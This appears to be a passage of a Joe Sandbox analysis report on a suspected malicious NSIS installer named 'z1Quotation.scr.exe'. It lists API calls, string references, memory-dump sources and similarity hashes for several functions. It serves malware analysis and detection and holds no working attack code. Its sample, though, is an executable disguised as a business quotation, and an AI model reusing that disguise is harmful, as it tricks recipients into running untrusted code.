                                                                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                  • String ID: $M$N
                                                                                                                  • API String ID: 2564846305-813528018
                                                                                                                  • Opcode ID: e4b5a23f527649b059869bfb33c614290955204e5ac428825b8bd88383326227
                                                                                                                  • Instruction ID: 4d796b0844a18dba4b3a5af92218c1317593fcd6e807591b857f5f84ca84bb31
                                                                                                                  • Opcode Fuzzy Hash: e4b5a23f527649b059869bfb33c614290955204e5ac428825b8bd88383326227
                                                                                                                  • Instruction Fuzzy Hash: 81026DB0A00609AFDF20DF54DD45AAE7BB5FB44354F14813AEA11BA2E1C7788D82CF58
                                                                                                                  Function 004045A9 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404634
                                                                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404648
                                                                                                                  • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404666
                                                                                                                  • GetSysColor.USER32(?), ref: 00404677
                                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404686
                                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404695
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00404698
                                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004046A7
                                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004046BC
                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040471E
                                                                                                                  • SendMessageA.USER32(00000000), ref: 00404721
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040474C
                                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040478C
                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040479B
                                                                                                                  • SetCursor.USER32(00000000), ref: 004047A4
                                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004047BA
                                                                                                                  • SetCursor.USER32(00000000), ref: 004047BD
                                                                                                                  • SendMessageA.USER32(00000111,?,00000000), ref: 004047E9
                                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004047FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                  • String ID: N$2B
                                                                                                                  • API String ID: 3103080414-1121222966
                                                                                                                  • Opcode ID: 7aaf303589d1806f3c5c3ec5ec1ef78a634fef0f57fc38d790edad24e7d650cf
                                                                                                                  • Instruction ID: f0df9ebe042f0e09a393b8a8d111da8af5027e336a798367db55d4f5f22ce0d2
                                                                                                                  • Opcode Fuzzy Hash: 7aaf303589d1806f3c5c3ec5ec1ef78a634fef0f57fc38d790edad24e7d650cf
                                                                                                                  • Instruction Fuzzy Hash: A561B3B1A00209BFEB10AF61DD41F6A3B69EB84714F10843AFB00BB1D1C778A951CF98
                                                                                                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                  • DrawTextA.USER32(00000000,Inaugurates Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                  • String ID: F$Inaugurates Setup
                                                                                                                  • API String ID: 941294808-1989954421
                                                                                                                  • Opcode ID: fd3c55e467a7729ccf7c85589dbda29c4605c5292bdc4fc1e7e332042d628291
                                                                                                                  • Instruction ID: 940e876990e797217803a3edca5eb74fa4908c9b1d1368a1209cd74081a255fd
                                                                                                                  • Opcode Fuzzy Hash: fd3c55e467a7729ccf7c85589dbda29c4605c5292bdc4fc1e7e332042d628291
                                                                                                                  • Instruction Fuzzy Hash: 03419C71400209AFCB058F95DE459BFBBB9FF44314F00842EF991AA1A0C738DA54DFA4
                                                                                                                  Function 00406007 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129memorystringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00406198,?,?), ref: 00406038
                                                                                                                  • GetShortPathNameA.KERNEL32(?,004226E0,00000400), ref: 00406041
                                                                                                                    • Part of subcall function 00405E96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA6
                                                                                                                    • Part of subcall function 00405E96: lstrlenA.KERNEL32(00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ED8
                                                                                                                  • GetShortPathNameA.KERNEL32(?,00422AE0,00000400), ref: 0040605E
                                                                                                                  • wsprintfA.USER32 ref: 0040607C
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00422AE0,C0000000,00000004,00422AE0,?,?,?,?,?), ref: 004060B7
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C6
                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FE
                                                                                                                  • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004222E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406154
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406165
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616C
                                                                                                                    • Part of subcall function 00405F31: GetFileAttributesA.KERNELBASE(00000003,00402FA4,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405F35
                                                                                                                    • Part of subcall function 00405F31: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F57
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                  • String ID: %s=%s$[Rename]$&B$*B$*B
                                                                                                                  • API String ID: 2171350718-779947378
                                                                                                                  • Opcode ID: c4bbbc6b5610b33bf20e07bc27bb868b4785a2ec59af68f78f2043699e73542c
                                                                                                                  • Instruction ID: 3212f88d1ae0b3abc92edcbd83ccc13ec3cf73ff012a95f320e7e7a5298a3394
                                                                                                                  • Opcode Fuzzy Hash: c4bbbc6b5610b33bf20e07bc27bb868b4785a2ec59af68f78f2043699e73542c
                                                                                                                  • Instruction Fuzzy Hash: 3A3125312007157BC2206B659D48F6B3A6CDF45758F16003BFA42FA2C3EA7C992286BD
                                                                                                                  Function 00406698 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 004066F0
                                                                                                                  • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 004066FD
                                                                                                                  • CharNextA.USER32(0000000C,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00406702
                                                                                                                  • CharPrevA.USER32(0000000C,0000000C,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00406712
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406699
                                                                                                                  • "C:\Users\user\Desktop\z1Quotation.scr.exe", xrefs: 00406698
                                                                                                                  • *?|<>/":, xrefs: 004066E0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                  • String ID: "C:\Users\user\Desktop\z1Quotation.scr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                  • API String ID: 589700163-2992510115
                                                                                                                  • Opcode ID: e3b32ff321b26b0a1dc254375672a9defa2cd2a2e06fedaefa84eb11869ec267
                                                                                                                  • Instruction ID: 6b1f500ea28191a645b4873287cbabda003428e9122aefe0fd80136451c21957
                                                                                                                  • Opcode Fuzzy Hash: e3b32ff321b26b0a1dc254375672a9defa2cd2a2e06fedaefa84eb11869ec267
                                                                                                                  • Instruction Fuzzy Hash: 5E11225180479129FB3216684C84BB77FC94F577A4F1A087FD5C2732C2CA7D4CA2866D
                                                                                                                  Function 00402EC2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 51COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402EDA
                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EF8
                                                                                                                  • wsprintfA.USER32 ref: 00402F26
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                    • Part of subcall function 004054E2: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                    • Part of subcall function 004054E2: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402E2A,00000000), ref: 00402F4A
                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402F58
                                                                                                                    • Part of subcall function 00402EA6: MulDiv.KERNEL32(000165DB,00000064,0001E074), ref: 00402EBB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                  • String ID: ... %d%%$#Vh*.@
                                                                                                                  • API String ID: 722711167-1861102526
                                                                                                                  • Opcode ID: 923a274c06915fc5e1b3f46a718b145c1b566ddbf4972089a7b9c372874a60c0
                                                                                                                  • Instruction ID: 7507ccaffddbc86483de0de60f8541ddbd2bcc6f1afb8e99b348566994b62a37
                                                                                                                  • Opcode Fuzzy Hash: 923a274c06915fc5e1b3f46a718b145c1b566ddbf4972089a7b9c372874a60c0
                                                                                                                  • Instruction Fuzzy Hash: 1701A171542225ABCB21BBA0EF0DBAB366CEB40745B10403BF905B21E0C6B89546DAED
                                                                                                                  Function 004044A5 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004044C2
                                                                                                                  • GetSysColor.USER32(00000000), ref: 00404500
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0040450C
                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00404518
                                                                                                                  • GetSysColor.USER32(?), ref: 0040452B
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040453B
                                                                                                                  • DeleteObject.GDI32(?), ref: 00404555
                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040455F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2320649405-0
                                                                                                                  • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                                                                                  • Instruction ID: a218f5533490173db671cca898ea84efb580a1fe8f5ba29b239c9fcf7d56435a
                                                                                                                  • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                                                                                  • Instruction Fuzzy Hash: 682162B1500704ABCB20DF78DD48A5B7BF8AF81754B04892EEB96B66E1D734E948CB14
                                                                                                                  Function 6D432568 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6D4312A5: GlobalAlloc.KERNEL32(00000040,6D4312C3,?,6D43135F,-6D43504B,6D4311C0,-000000A0), ref: 6D4312AD
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D43266E
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D4326A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33522346025.000000006D430000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522508051.000000006D434000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522587751.000000006D436000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1780285237-0
                                                                                                                  • Opcode ID: 764706b84cacb3abdb2dc33b4f4ea3cabfc7aab8a7d3eef1de547048b611bb82
                                                                                                                  • Instruction ID: 7b84e4869f8508582bb32b514a2ec9bcde8f476c642ccd21964ff62786ac1a27
                                                                                                                  • Opcode Fuzzy Hash: 764706b84cacb3abdb2dc33b4f4ea3cabfc7aab8a7d3eef1de547048b611bb82
                                                                                                                  • Instruction Fuzzy Hash: 6341CE71208265EFDB219F5EC8C4D7A77BAFF8E344B2A452DF64086210CB329C15CBA1
                                                                                                                  Function 00404D91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404DAC
                                                                                                                  • GetMessagePos.USER32 ref: 00404DB4
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404DCE
                                                                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404DE0
                                                                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404E06
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                  • String ID: f
                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                  • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                                                                                  • Instruction ID: 7a5e67cc95997a3f314e86f4f619c95dbfcf99501b2572fc00705676140b69ea
                                                                                                                  • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                                                                                  • Instruction Fuzzy Hash: C5019E71900219BADB10DB94DD81FFFBBBCAF44711F10012BFA00B61C0C7B499418BA4
                                                                                                                  Function 00401E3A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(?), ref: 00401E3D
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E57
                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5F
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E70
                                                                                                                  • CreateFontIndirectA.GDI32(0040B820), ref: 00401EBF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                  • String ID: Tahoma
                                                                                                                  • API String ID: 3808545654-3580928618
                                                                                                                  • Opcode ID: 2bddf6615e3cd0986e6f8712752886064c683dd570d88724b5c0469a0aae3fb0
                                                                                                                  • Instruction ID: 66cd373c931870e5cec5ec28b80d681fc6019721b3b0b59b4e56f1f017b83f12
                                                                                                                  • Opcode Fuzzy Hash: 2bddf6615e3cd0986e6f8712752886064c683dd570d88724b5c0469a0aae3fb0
                                                                                                                  • Instruction Fuzzy Hash: D5019E72944344AFE7007BA4AE8AA9D3FF8EB15700F10943AF241B62F2CB780045CB6D
                                                                                                                  Function 00402E2A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
